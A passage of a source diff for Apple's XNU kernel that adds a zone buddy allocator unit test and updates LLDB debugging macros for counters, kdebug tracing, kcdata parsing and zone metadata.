-#if !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR)
-       /*
-        * this test won't be able to open the root disk device unless CSR is
-        * disabled or in AppleInternal mode
-        */
-       if (csr_check( CSR_ALLOW_UNRESTRICTED_FS ) &&
-           csr_check( CSR_ALLOW_APPLE_INTERNAL )) {
-               T_SKIP("System Integrity Protection is enabled");
-       }
-#endif
-
-       T_SETUPBEGIN;
-
-       T_WITH_ERRNO;
-       T_ASSERT_GT(getmntinfo( &my_infop, MNT_NOWAIT ), 0, "getmntinfo");
-
-       /* make this a raw device */
-       strlcpy( &my_name[0], &my_infop->f_mntfromname[0], sizeof(my_name));
-       if ((my_ptr = strrchr( &my_name[0], '/' )) != 0) {
-               if (my_ptr[1] != 'r') {
-                       my_ptr[strlen( my_ptr )] = 0x00;
-                       memmove( &my_ptr[2], &my_ptr[1], (strlen( &my_ptr[1] ) + 1));
-                       my_ptr[1] = 'r';
-               }
-       }
-
-       T_ASSERT_POSIX_SUCCESS(my_fd = open( &my_name[0], O_RDONLY ), "open");
-
-       T_SETUPEND;
-
-       /* obtain the size of the media (in blocks) */
-       T_EXPECT_POSIX_SUCCESS(my_err = ioctl( my_fd, DKIOCGETBLOCKCOUNT, &my_block_count ),
-           "ioctl DKIOCGETBLOCKCOUNT");
-
-       /* obtain the block size of the media */
-       T_EXPECT_POSIX_SUCCESS(my_err = ioctl( my_fd, DKIOCGETBLOCKSIZE, &my_blksize ),
-           "ioctl DKIOCGETBLOCKSIZE");
-
-       T_LOG( "my_block_count %qd my_blksize %d \n", my_block_count, my_blksize );
-
-       if (my_err != -1) {
-               /* make sure the returned data looks somewhat valid */
-               T_EXPECT_GE(my_blksize, 0, NULL);
-               T_EXPECT_LE(my_blksize, 1024 * 1000, NULL);
-       }
-
-       close( my_fd );
-}
diff --git a/tests/zalloc_buddy.c b/tests/zalloc_buddy.c
new file mode 100644 (file)
index 0000000..76ed259
--- /dev/null
@@ -0,0 +1,131 @@
+#include <darwintest.h>
+#include <darwintest_utils.h>
+
+#include <mach/mach.h>
+#include <sys/mman.h>
+
+#undef __abortlike
+#define __abortlike
+#define panic(fmt, ...) ({ T_FAIL(fmt, __VA_ARGS__); abort(); })
+
+#define __security_const_late
+#define ZALLOC_TEST 1
+#include "../osfmk/kern/zalloc.c"
+
+#define ZBA_TEST_SIZE  (1ul << 20)
+
+static void
+zba_populate_any(vm_address_t addr, vm_size_t size)
+{
+       int rc = mprotect((void *)addr, size, PROT_READ | PROT_WRITE);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(rc, "mprotect");
+}
+
+static void
+zba_populate_nope(vm_address_t addr, vm_size_t size)
+{
+#pragma unused(addr, size)
+       T_FAIL("Trying to extend the storage");
+       T_END;
+}
+
+static void
+zba_test_allow_extension(void)
+{
+       zba_test_info.zbats_populate = zba_populate_any;
+}
+
+static void
+zba_test_disallow_extension(void)
+{
+       zba_test_info.zbats_populate = zba_populate_nope;
+}
+
+static void
+zba_test_setup(void)
+{
+       kern_return_t kr;
+       int rc;
+
+       kr = vm_allocate(mach_task_self(), &zba_test_info.zbats_base,
+           ZBA_TEST_SIZE + ZBA_CHUNK_SIZE, VM_FLAGS_ANYWHERE);
+       T_ASSERT_MACH_SUCCESS(kr, "vm_allocate()");
+
+       zba_test_info.zbats_base = roundup(zba_test_info.zbats_base,
+           ZBA_CHUNK_SIZE);
+
+       rc = mprotect(zba_base_header(), ZBA_TEST_SIZE, PROT_NONE);
+       T_ASSERT_POSIX_SUCCESS(rc, "mprotect");
+
+       T_LOG("SETUP allocator with base at %p", zba_base_header());
+
+       zba_test_allow_extension();
+       zba_populate(0);
+       zba_init_chunk(0);
+}
+
+T_DECL(zone_buddy_allocator_encodings, "test the buddy allocator formulas")
+{
+       uint8_t bits[sizeof(zba_base_header()->zbah_bits)] = { };
+
+       for (uint32_t o = ZBA_MAX_ORDER + 1; o-- > 0;) {
+               for (vm_address_t pos = 0; pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE << o) {
+                       struct zone_bits_chain *zbc;
+                       size_t node = zba_node(pos, o);
+
+                       zbc = zba_chain_for_node(NULL, node, o);
+                       T_QUIET; T_ASSERT_EQ(pos, (vm_offset_t)zbc,
+                           "zba_node / zba_chain_for_node is reversible (pos: %lx, node %zd)",
+                           pos, node);
+
+
+                       if (o == 0) {
+                               // leaf nodes aren't represented in the bitmap
+                               continue;
+                       }
+                       T_QUIET; T_ASSERT_LT(node, 8 * sizeof(bits), "fits in bitfield: %zd", pos);
+                       T_QUIET; T_ASSERT_EQ(0, bits[node / 8] & (1 << (node % 8)), "never seen");
+                       bits[node / 8] ^= 1 << (node % 8);
+               }
+       }
+
+       T_PASS("zba_node, zba_chain_for_node look sane");
+}
+
+T_DECL(zone_buddy_allocator, "test the zone bits setup")
+{
+       vm_address_t base, pos;
+
+       zba_test_setup();
+
+       zba_test_disallow_extension();
+
+       base = (vm_address_t)zba_slot_base();
+       for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc");
+               *(uint64_t *)(base + pos) = ~0ull;
+       }
+       for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               zba_free(base + pos, 0);
+       }
+
+       for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc");
+               *(uint64_t *)(base + pos) = ~0ull;
+       }
+       zba_test_allow_extension();
+
+       base += ZBA_CHUNK_SIZE;
+       for (pos = zba_chunk_header_size(1); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc");
+               *(uint64_t *)(base + pos) = ~0ull;
+       }
+
+       for (pos = zba_chunk_header_size(1); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               zba_free(base + pos, 0);
+       }
+       base -= ZBA_CHUNK_SIZE;
+       for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) {
+               zba_free(base + pos, 0);
+       }
+}
index f00ff970a707e8f4ac248df8456c5036df5043c6..f20f231da16cce0c7642a1765c3950bdf189439c 100644 (file)
@@ -79,7 +79,8 @@ LLDBMACROS_PYTHON_FILES = $(LLDBMACROS_USERDEBUG_FILES) \
        pgtrace.py \
        xnutriage.py \
        zonetriage.py \
-       sysreg.py
+       sysreg.py \
+       counter.py
 
 ifneq ($(PLATFORM),MacOSX)
        LLDBMACROS_PYTHON_FILES+= \
index d21b5c91269aaaf7553587b29e945963065af23f..0168046c9b7f2521865ee3f8e3772ef4a4346003 100755 (executable)
@@ -314,6 +314,7 @@ class KernelTarget(object):
         self._thread_groups = []
         self._allproc = []
         self._terminated_tasks_list = []
+        self._terminated_threads_list = []
         self._zones_list = []
         self._zombproc_list = []
         self._kernel_types_cache = {} #this will cache the Type objects as and when requested.
@@ -591,6 +592,17 @@ class KernelTarget(object):
             caching.SaveDynamicCacheData("kern._terminated_tasks_list", self._terminated_tasks_list)
             return self._terminated_tasks_list
 
+        if name == 'terminated_threads' :
+            self._terminated_threads_list = caching.GetDynamicCacheData("kern._terminated_threads_list", [])
+            if len(self._terminated_threads_list) > 0 : return self._terminated_threads_list
+            thread_queue_head = self.GetGlobalVariable('terminated_threads')
+            thread_type = LazyTarget.GetTarget().FindFirstType('thread')
+            thread_ptr_type = thread_type.GetPointerType()
+            for trd in IterateQueue(thread_queue_head, thread_ptr_type, 'threads'):
+                self._terminated_threads_list.append(trd)
+            caching.SaveDynamicCacheData("kern._terminated_threads_list", self._terminated_threads_list)
+            return self._terminated_threads_list
+
         if name == 'procs' :
             self._allproc = caching.GetDynamicCacheData("kern._allproc", [])
             if len(self._allproc) > 0 : return self._allproc
index 02ec68eb5762ad27060f13559a3488e50702dd4e..916f66a07209616fe968960d200b1c79987297bb 100755 (executable)
@@ -15,6 +15,11 @@ import re
 
 tabs_search_rex = re.compile("^\s*\t+",re.MULTILINE|re.DOTALL)
 
+def find_non_ascii(s):
+    for c in s:
+        if ord(c) >= 0x80: return True
+    return False
+
 if __name__ == "__main__":
     if len(sys.argv) < 2:
         print >>sys.stderr, "Error: Unknown arguments"
@@ -30,13 +35,16 @@ if __name__ == "__main__":
         fh = open(fname)
         strdata = fh.readlines()
         lineno = 0
-        tab_check_status = True
+        syntax_fail = False
         for linedata in strdata:
             lineno += 1
             if len(tabs_search_rex.findall(linedata)) > 0 :
                 print >>sys.stderr, "Error: Found a TAB character at %s:%d" % (fname, lineno)
-                tab_check_status = False
-        if tab_check_status == False:
+                syntax_fail = True
+            if find_non_ascii(linedata):
+                print >>sys.stderr, "Error: Found a non-ASCII character at %s:%d" % (fname, lineno)
+                syntax_fail = True
+        if syntax_fail:
             print >>sys.stderr, "Error: Syntax check failed. Please fix the errors and try again."
             sys.exit(1)
         #now check for error in compilation
diff --git a/tools/lldbmacros/counter.py b/tools/lldbmacros/counter.py
new file mode 100755 (executable)
index 0000000..200c337
--- /dev/null
@@ -0,0 +1,24 @@
+from memory import IterateZPerCPU
+from xnu import *
+
+@lldb_type_summary(['scalable_counter_t'])
+@header("Counter Value\n-------------")
+def GetSimpleCounter(counter):
+    """ Prints out the value of a percpu counter
+        params: counter: value - value object representing counter
+        returns: str - The value of the counter as a string.
+    """
+    val = 0
+    for v in IterateZPerCPU(counter, "uint64_t *"):
+        val += dereference(v)
+    return str(val)
+
+@lldb_command('showcounter')
+def ShowSimpleCounter(cmd_args=None):
+    """ Show the value of a percpu counter.
+        Usage: showcounter <address of counter>
+    """
+    if not cmd_args:
+        raise ArgumentError("Please specify the address of the counter you want to read.")
+        return
+    print GetSimpleCounter(kern.GetValueFromAddress(cmd_args[0], "scalable_counter_t"))
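
The showcounter macro above simply walks the per-CPU slots of a scalable_counter_t and sums them. A minimal standalone sketch of that accumulation, using a plain Python list as a stand-in for the values IterateZPerCPU would yield inside LLDB (the numbers are purely illustrative):

    # hypothetical per-CPU values; inside LLDB these would come from
    # IterateZPerCPU(counter, "uint64_t *")
    per_cpu_slots = [12, 7, 0, 23]
    total = 0
    for v in per_cpu_slots:   # mirrors the loop in GetSimpleCounter
        total += v
    # total == 42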
index 4ae6086e61a84e68696c6274be9823e4aba07c83..7f7c65163419be8510b2efc4f3f65a787bca4361 100755 (executable)
@@ -1242,14 +1242,14 @@ def IterateAllPorts(tasklist, func, ctx, include_psets, follow_busyports, should
             func(t, space, ctx, taskports_idx, 0, t.itk_debug_control, 17)
         if unsigned(t.itk_task_access) > 0:
             func(t, space, ctx, taskports_idx, 0, t.itk_task_access, 17)
-        if unsigned(t.itk_self[1]) > 0: ## task read port
-            func(t, space, ctx, taskports_idx, 0, t.itk_self[1], 17)
-        if unsigned(t.itk_self[2]) > 0: ## task inspect port
-            func(t, space, ctx, taskports_idx, 0, t.itk_self[2], 17)
+        if unsigned(t.itk_task_ports[1]) > 0: ## task read port
+            func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[1], 17)
+        if unsigned(t.itk_task_ports[2]) > 0: ## task inspect port
+            func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[2], 17)
 
         ## Task name port (not a send right, just a naked ref); TASK_FLAVOR_NAME = 3
-        if unsigned(t.itk_self[3]) > 0:
-            func(t, space, ctx, taskports_idx, 0, t.itk_self[3], 0)
+        if unsigned(t.itk_task_ports[3]) > 0:
+            func(t, space, ctx, taskports_idx, 0, t.itk_task_ports[3], 0)
 
         ## task resume port is a receive right to resume the task
         if unsigned(t.itk_resume) > 0:
index 94f133ccda751fc0e9f0b7e5c243a36b51af8769..7a95127e4fe5eda9d9ffb2e85434eb07b112ca66 100755 (executable)
@@ -82,7 +82,7 @@ def print_alloc_free_entry(addr, orig_ptr):
             leftrz = 16
         else:
             alloc_type = "zone"
-            leftrz = unsigned(zone.kasan_redzone)
+            leftrz = unsigned(zone.z_kasan_redzone)
     else:
         alloc_type = "kalloc"
         if asz - usz >= 2*pgsz:
index a17eec8b23bb0d82e88e52845b25c6fdacf35bb3..08aa8dbcb79ca92920d9d56a765b95661fa540df 100755 (executable)
@@ -16,6 +16,10 @@ import contextlib
 import base64
 import zlib
 
+# can be removed once we move to Python3.1+
+from future.utils.surrogateescape import register_surrogateescape
+register_surrogateescape()
+
 class Globals(object):
     pass
 G = Globals()
@@ -165,6 +169,13 @@ KNOWN_TOPLEVEL_CONTAINER_TYPES = ()
 def enum(**args):
     return type('enum', (), args)
 
+#
+# Decode bytes as UTF-8, using surrogateescape if there are invalid UTF-8
+# sequences; see PEP-383
+#
+def BytesToString(b):
+    return b.decode('utf-8', errors="surrogateescape")
+
 KCSUBTYPE_TYPE = enum(KC_ST_CHAR=1, KC_ST_INT8=2, KC_ST_UINT8=3, KC_ST_INT16=4, KC_ST_UINT16=5, KC_ST_INT32=6, KC_ST_UINT32=7, KC_ST_INT64=8, KC_ST_UINT64=9)
 
 
@@ -210,7 +221,7 @@ class KCSubTypeElement(object):
     @staticmethod
     def FromBinaryTypeData(byte_data):
         (st_flag, st_type, st_offset, st_size, st_name) = struct.unpack_from('=BBHI32s', byte_data)
-        st_name = st_name.rstrip('\x00')
+        st_name = BytesToString(st_name.rstrip('\0'))
         return KCSubTypeElement(st_name, st_type, st_size, st_offset, st_flag)
 
     @staticmethod
@@ -238,7 +249,10 @@ class KCSubTypeElement(object):
         return self.totalsize
 
     def GetValueAsString(self, base_data, array_pos=0):
-        return str(self.GetValue(base_data, array_pos))
+        v = self.GetValue(base_data, array_pos)
+        if isinstance(v, bytes):
+            return BytesToString(v)
+        return str(v)
 
     def GetValue(self, base_data, array_pos=0):
         return struct.unpack_from(self.unpack_fmt, base_data[self.offset + (array_pos * self.size):])[0]
@@ -499,14 +513,14 @@ class KCObject(object):
         elif self.i_type == GetTypeForName('KCDATA_TYPE_UINT32_DESC'):
             self.is_naked_type = True
             u_d = struct.unpack_from('32sI', self.i_data)
-            self.i_name = u_d[0].strip(chr(0))
+            self.i_name = BytesToString(u_d[0].rstrip('\0'))
             self.obj = u_d[1]
             logging.info("0x%08x: %s%s" % (self.offset, INDENT(), self.i_name))
 
         elif self.i_type == GetTypeForName('KCDATA_TYPE_UINT64_DESC'):
             self.is_naked_type = True
             u_d = struct.unpack_from('32sQ', self.i_data)
-            self.i_name = u_d[0].strip(chr(0))
+            self.i_name = BytesToString(u_d[0].rstrip('\0'))
             self.obj = u_d[1]
             logging.info("0x%08x: %s%s" % (self.offset, INDENT(), self.i_name))
 
@@ -944,6 +958,7 @@ KNOWN_TYPES_COLLECTION[GetTypeForName('STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO')]
     KCSubTypeElement('imageLoadAddress', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 0, 0),
     KCSubTypeElement('imageUUID', KCSUBTYPE_TYPE.KC_ST_UINT8, KCSubTypeElement.GetSizeForArray(16, 1), 8, 1),
     KCSubTypeElement('imageSlidBaseAddress', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 24, 0),
+    KCSubTypeElement('sharedCacheSlidFirstMapping', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 32, 0),
 ),
     'shared_cache_dyld_load_info',
     legacy_size = 0x18
@@ -1238,6 +1253,7 @@ KNOWN_TYPES_COLLECTION[GetTypeForName('STACKSHOT_KCTYPE_STACKSHOT_DURATION')] =
     (
         KCSubTypeElement.FromBasicCtype('stackshot_duration', KCSUBTYPE_TYPE.KC_ST_UINT64, 0),
         KCSubTypeElement.FromBasicCtype('stackshot_duration_outer', KCSUBTYPE_TYPE.KC_ST_UINT64, 8),
+        KCSubTypeElement.FromBasicCtype('stackshot_duration_prior', KCSUBTYPE_TYPE.KC_ST_UINT64, 16),
     ), 'stackshot_duration', merge=True
 )
 
@@ -1759,30 +1775,6 @@ def RunCommand(bash_cmd_string, get_stderr = True):
         return (exit_code, output_str)
 
 
-parser = argparse.ArgumentParser(description="Decode a kcdata binary file.")
-parser.add_argument("-l", "--listtypes", action="store_true", required=False, default=False,
-                    help="List all known types",
-                    dest="list_known_types")
-
-parser.add_argument("-s", "--stackshot", required=False, default=False,
-                    help="Generate a stackshot report file",
-                    dest="stackshot_file")
-
-parser.add_argument("--multiple", help="look for multiple stackshots in a single file", action='store_true')
-
-parser.add_argument("-p", "--plist", required=False, default=False,
-                    help="output as plist", action="store_true")
-
-parser.add_argument("-S", "--sdk", required=False, default="", help="sdk property passed to xcrun command to find the required tools. Default is empty string.", dest="sdk")
-parser.add_argument("--pretty", default=False, action='store_true', help="make the output a little more human readable")
-parser.add_argument("--incomplete", action='store_true', help="accept incomplete data")
-parser.add_argument("kcdata_file", type=argparse.FileType('r'), help="Path to a kcdata binary file.")
-
-class VerboseAction(argparse.Action):
-    def __call__(self, parser, namespace, values, option_string=None):
-        logging.basicConfig(level=logging.INFO, stream=sys.stderr, format='%(message)s')
-parser.add_argument('-v', "--verbose", action=VerboseAction, nargs=0)
-
 @contextlib.contextmanager
 def data_from_stream(stream):
     try:
@@ -1858,7 +1850,7 @@ def prettify(data):
                 value = '%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X' % tuple(value)
             elif 'address' in key.lower() and isinstance(value, (int, long)):
                 value = '0x%X' % value
-            elif key == 'lr':
+            elif key == 'lr' or key == 'sharedCacheSlidFirstMapping':
                 value = '0x%X' % value
             elif key == 'thread_waitinfo':
                 value = map(formatWaitInfo, value)
@@ -1876,6 +1868,30 @@ def prettify(data):
 
 
 if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description="Decode a kcdata binary file.")
+    parser.add_argument("-l", "--listtypes", action="store_true", required=False, default=False,
+                        help="List all known types",
+                        dest="list_known_types")
+
+    parser.add_argument("-s", "--stackshot", required=False, default=False,
+                        help="Generate a stackshot report file",
+                        dest="stackshot_file")
+
+    parser.add_argument("--multiple", help="look for multiple stackshots in a single file", action='store_true')
+
+    parser.add_argument("-p", "--plist", required=False, default=False,
+                        help="output as plist", action="store_true")
+
+    parser.add_argument("-S", "--sdk", required=False, default="", help="sdk property passed to xcrun command to find the required tools. Default is empty string.", dest="sdk")
+    parser.add_argument("--pretty", default=False, action='store_true', help="make the output a little more human readable")
+    parser.add_argument("--incomplete", action='store_true', help="accept incomplete data")
+    parser.add_argument("kcdata_file", type=argparse.FileType('r'), help="Path to a kcdata binary file.")
+
+    class VerboseAction(argparse.Action):
+        def __call__(self, parser, namespace, values, option_string=None):
+            logging.basicConfig(level=logging.INFO, stream=sys.stderr, format='%(message)s')
+    parser.add_argument('-v', "--verbose", action=VerboseAction, nargs=0)
+
     args = parser.parse_args()
 
     if args.multiple and args.stackshot_file:
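
The BytesToString helper above relies on PEP 383 surrogateescape decoding, so kcdata strings that contain invalid UTF-8 sequences survive a decode/encode round trip instead of raising. A tiny standalone sketch of that behaviour (built into Python 3; Python 2 needs the future package's register_surrogateescape(), as imported above):

    raw = b'name-\xff\xfe'                    # not valid UTF-8
    s = raw.decode('utf-8', errors='surrogateescape')
    # lossless round trip back to the original bytes
    assert s.encode('utf-8', errors='surrogateescape') == raw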
index 80360f65079043c97219fcf9ac3b4d4ab43cf93a..10848f494769f67ed505da21d34a8f353e052120 100755 (executable)
@@ -2,7 +2,9 @@ from xnu import *
 from utils import *
 from core.lazytarget import *
 from misc import *
+from kcdata import kcdata_item_iterator, KCObject, GetTypeForName, KCCompressedBufferObject
 from collections import namedtuple
+import heapq
 
 # From the defines in bsd/sys/kdebug.h:
 
@@ -261,100 +263,118 @@ def ShowKtrace(cmd_args=None):
     print GetKperfStatus()
 
 
-class KDCPU(object):
-    def __init__(self, store, curidx):
-        self.store = store
-        self.curidx = curidx
-        self.oldest_time = None
+class KDEvent(object):
+    """
+    Wrapper around kevent pointer that handles sorting logic.
+    """
+    def __init__(self, timestamp, kevent):
+        self.kevent = kevent
+        self.timestamp = timestamp
 
+    def get_kevent(self):
+        return self.kevent
 
-def IterateKdebugEvents():
+    def __eq__(self, other):
+        return self.timestamp == other.timestamp
+
+    def __lt__(self, other):
+        return self.timestamp < other.timestamp
+
+    def __gt__(self, other):
+        return self.timestamp > other.timestamp
+
+
+class KDCPU(object):
     """
-    Yield events from the in-memory kdebug trace buffers.
+    Represents all events from a single CPU.
     """
-    ctrl = kern.globals.kd_ctrl_page
+    def __init__(self, cpuid):
+        self.cpuid = cpuid
+        self.iter_store = None
+
+        kdstoreinfo = kern.globals.kdbip[cpuid]
+        self.kdstorep = kdstoreinfo.kd_list_head
+
+        if self.kdstorep.raw == xnudefines.KDS_PTR_NULL:
+            # Returns an empty iterrator. It will immediatelly stop at
+            # Returns an empty iterator. It will immediately stop at the
+            # first call to __next__().
 
-    def get_kdstore(kdstorep):
+        self.iter_store = self.get_kdstore(self.kdstorep)
+
+        # XXX Doesn't have the same logic to avoid un-mergeable events
+        #     (respecting barrier_min and bufindx) as the C code.
+
+        self.iter_idx = self.iter_store.kds_readlast
+
+    def get_kdstore(self, kdstorep):
         """
         See POINTER_FROM_KDSPTR.
         """
         buf = kern.globals.kd_bufs[kdstorep.buffer_index]
         return addressof(buf.kdsb_addr[kdstorep.offset])
 
-    def get_kdbuf_timestamp(kdbuf):
-        time_cpu = kdbuf.timestamp
-        return unsigned(time_cpu)
+    # Event iterator implementation returns KDEvent instance
 
-    if (ctrl.kdebug_flags & xnudefines.KDBG_BFINIT) == 0:
-        return
+    def __iter__(self):
+        return self
 
-    barrier_min = ctrl.oldest_time
+    def __next__(self):
+        # This CPU is out of events
+        if self.iter_store is None:
+            raise StopIteration
 
-    if (ctrl.kdebug_flags & xnudefines.KDBG_WRAPPED) != 0:
-        # TODO Yield a wrap event with the barrier_min timestamp.
-        pass
+        if self.iter_idx == self.iter_store.kds_bufindx:
+            self.iter_store = None
+            raise StopIteration
 
-    # Set up CPU state for merging events.
-    ncpus = ctrl.kdebug_cpus
-    cpus = []
-    for cpu in range(ncpus):
-        kdstoreinfo = kern.globals.kdbip[cpu]
-        storep = kdstoreinfo.kd_list_head
-        store = None
-        curidx = 0
-        if storep.raw != xnudefines.KDS_PTR_NULL:
-            store = get_kdstore(storep)
-            curidx = store.kds_readlast
-        # XXX Doesn't have the same logic to avoid un-mergeable events
-        #     (respecting barrier_min and bufindx) as the C code.
+        keventp = addressof(self.iter_store.kds_records[self.iter_idx])
+        timestamp = unsigned(keventp.timestamp)
 
-        cpus.append(KDCPU(store, curidx))
+        # check for writer overrun
+        if timestamp < self.iter_store.kds_timestamp:
+            raise StopIteration
 
-    while True:
-        earliest_time = 0xffffffffffffffff
-        min_cpu = None
-        for cpu in cpus:
-            if not cpu.store:
-                continue
+        # Advance iterator
+        self.iter_idx += 1
 
-            # Check for overrunning the writer, which also indicates the CPU is
-            # out of events.
-            if cpu.oldest_time:
-                timestamp = cpu.oldest_time
+        if self.iter_idx == xnudefines.EVENTS_PER_STORAGE_UNIT:
+            snext = self.iter_store.kds_next
+            if snext.raw == xnudefines.KDS_PTR_NULL:
+                # Terminate iteration in next loop. Current element is the
+                # last one in this CPU buffer.
+                self.iter_store = None
             else:
-                timestamp = get_kdbuf_timestamp(
-                        addressof(cpu.store.kds_records[cpu.curidx]))
-                cpu.oldest_time = timestamp
+                self.iter_store = self.get_kdstore(snext)
+                self.iter_idx = self.iter_store.kds_readlast
 
-            if timestamp < cpu.store.kds_timestamp:
-                cpu.store = None
-                continue
+        return KDEvent(timestamp, keventp)
 
-            if timestamp < earliest_time:
-                earliest_time = timestamp
-                min_cpu = cpu
+    # Python 2 compatibility
+    def next(self):
+        return self.__next__()
 
-        # Out of events.
-        if not min_cpu:
-            return
 
-        yield min_cpu.store.kds_records[min_cpu.curidx]
-        min_cpu.oldest_time = None
+def IterateKdebugEvents():
+    """
+    Yield events from the in-memory kdebug trace buffers.
+    """
+    ctrl = kern.globals.kd_ctrl_page
 
-        min_cpu.curidx += 1
-        if min_cpu.curidx == xnudefines.EVENTS_PER_STORAGE_UNIT:
-            next = min_cpu.store.kds_next
-            if next.raw == xnudefines.KDS_PTR_NULL:
-                min_cpu.store = None
-                min_cpu.curidx = None
-            else:
-                min_cpu.store = get_kdstore(next)
-                min_cpu.curidx = min_cpu.store.kds_readlast
+    if (ctrl.kdebug_flags & xnudefines.KDBG_BFINIT) == 0:
+        return
+
+    barrier_min = ctrl.oldest_time
 
-        # This CPU is out of events.
-        if min_cpu.curidx == min_cpu.store.kds_bufindx:
-            min_cpu.store = None
-            continue
+    if (ctrl.kdebug_flags & xnudefines.KDBG_WRAPPED) != 0:
+        # TODO Yield a wrap event with the barrier_min timestamp.
+        pass
+
+    # Merge sort all events from all CPUs.
+    cpus = [KDCPU(cpuid) for cpuid in range(ctrl.kdebug_cpus)]
+
+    for event in heapq.merge(*cpus):
+        yield event.get_kevent()
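+
+# Illustrative only (not part of this change): a caller can drain the merged
+# stream directly.  This assumes KDEvent compares by timestamp, which is what
+# lets heapq.merge interleave the per-CPU KDCPU iterators above, e.g.:
+#
+#   for kd in IterateKdebugEvents():
+#       print unsigned(kd.timestamp), unsigned(kd.debugid)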
 
 
 def GetKdebugEvent(event):
@@ -476,7 +496,7 @@ def SaveKdebugTrace(cmd_args=None, cmd_options={}):
                 continue
 
             event = process.ReadMemory(
-                    unsigned(addressof(event)), event_size, error)
+                    unsigned(event), event_size, error)
             file_offset += event_size
             f.write(event)
             written_nevents += 1
@@ -499,12 +519,30 @@ def SaveKdebugTrace(cmd_args=None, cmd_options={}):
         kcdata_length = unsigned(kcdata.kcd_length)
         if kcdata_addr != 0 and kcdata_length != 0:
             print('writing stackshot')
-            f.write(struct.pack(CHUNKHDR_PACK, SSHOT_TAG, 1, 0, kcdata_length))
-            file_offset += 16
             if verbose:
-                print('stackshot is {} bytes long'.format(kcdata_length))
                 print('stackshot starts at offset {}'.format(file_offset))
+                print('stackshot is {} bytes long'.format(kcdata_length))
             ssdata = process.ReadMemory(kcdata_addr, kcdata_length, error)
+            magic = struct.unpack('I', ssdata[:4])
+            if magic[0] == GetTypeForName('KCDATA_BUFFER_BEGIN_COMPRESSED'):
+                if verbose:
+                    print('found compressed stackshot')
+                iterator = kcdata_item_iterator(ssdata)
+                for item in iterator:
+                    kcdata_buffer = KCObject.FromKCItem(item)
+                    if isinstance(kcdata_buffer, KCCompressedBufferObject):
+                        kcdata_buffer.ReadItems(iterator)
+                        decompressed = kcdata_buffer.Decompress(ssdata)
+                        ssdata = decompressed
+                        kcdata_length = len(ssdata)
+                        if verbose:
+                            print(
+                                    'compressed stackshot is {} bytes long'.
+                                    format(kcdata_length))
+
+            f.write(struct.pack(CHUNKHDR_PACK, SSHOT_TAG, 1, 0, kcdata_length))
+            file_offset += 16
+
             f.write(ssdata)
             file_offset += kcdata_length
             if verbose:
index 93e85f7590ea7c0408a80ab8ec5fb6cc0f84e7f8..e9120e03d179f99aab7a59d9d94f44a740144a63 100755 (executable)
@@ -39,8 +39,7 @@ def MBufStat(cmd_args=None):
                                   (mcs.mbcl_total - total - mcs.mbcl_infree),
                                   mcs.mbcl_fail_cnt, mbuf.mtbl_cache.mc_waiter_cnt,
                                   mcs.mbcl_notified, mcs.mbcl_purge_cnt,
-                                  mbuf.mtbl_maxlimit
-                                  )
+                                  mbuf.mtbl_maxlimit)
 # EndMacro: mbuf_stat
 
 # Macro: mbuf_walkpkt
index be557e7b8059875907f71487a64b70cd3838d963..8f62be95675e9229a5cdaba286c32c8376247741 100755 (executable)
@@ -31,18 +31,31 @@ def vm_unpack_pointer(packed, params, type_str = 'void *'):
         addr >>= 64 - bits - shift
     return kern.GetValueFromAddress(addr, type_str)
 
-def IterateZPerCPU(root, element_type):
+def GetZPerCPU(root, cpu, element_type = None):
     """ Iterates over a percpu variable
         params:
             root         - value : Value object for per-cpu variable
+            cpu          - int   : the CPU number
             element_type - str   : Type of element
         returns:
             one slot
     """
     pagesize = kern.globals.page_size
     mangle   = 1 << (8 * kern.ptrsize - 1)
+    if element_type is None:
+        element_type = root.GetSBValue().GetType()
+    return kern.GetValueFromAddress((int(root) | mangle) + cpu * pagesize, element_type)
+
+def IterateZPerCPU(root, element_type = None):
+    """ Iterates over a percpu variable
+        params:
+            root         - value : Value object for per-cpu variable
+            element_type - str   : Type of element
+        returns:
+            a generator yielding one slot per CPU
+    """
     for i in range(0, kern.globals.zpercpu_early_count):
-        yield kern.GetValueFromAddress((int(root) | mangle) + i * pagesize, element_type)
+        yield GetZPerCPU(root, i, element_type)
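+
+# Address-math sketch (illustrative, derived from GetZPerCPU above): per-CPU
+# slots sit one page apart and the stored base has its top bit dropped, so the
+# slot for CPU n is recovered as:
+#
+#   mangle = 1 << (8 * kern.ptrsize - 1)
+#   slot_n = (int(root) | mangle) + n * kern.globals.page_size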
 
 @lldb_command('showzpcpu', "S")
 def ShowZPerCPU(cmd_args=None, cmd_options={}):
@@ -226,25 +239,24 @@ class ZoneMeta(object):
     Helper class that helps with walking zone metadata
     """
 
-    @classmethod
-    def _looksForeign(cls, addr):
-        if addr & (kern.globals.page_size - 1):
-            return False
-        try:
-            meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *")
-            return meta.zm_foreign_cookie[0] == 0x123456789abcdef
-        except:
-            return False
-
     def __init__(self, addr, isPageIndex = False):
         global kern
         pagesize  = kern.globals.page_size
         zone_info = kern.GetGlobalVariable('zone_info')
 
-        self.zone_map_min   = unsigned(zone_info.zi_map_range.min_address)
-        self.zone_map_max   = unsigned(zone_info.zi_map_range.max_address)
-        self.zone_meta_min  = unsigned(zone_info.zi_meta_range.min_address)
-        self.zone_meta_max  = unsigned(zone_info.zi_meta_range.max_address)
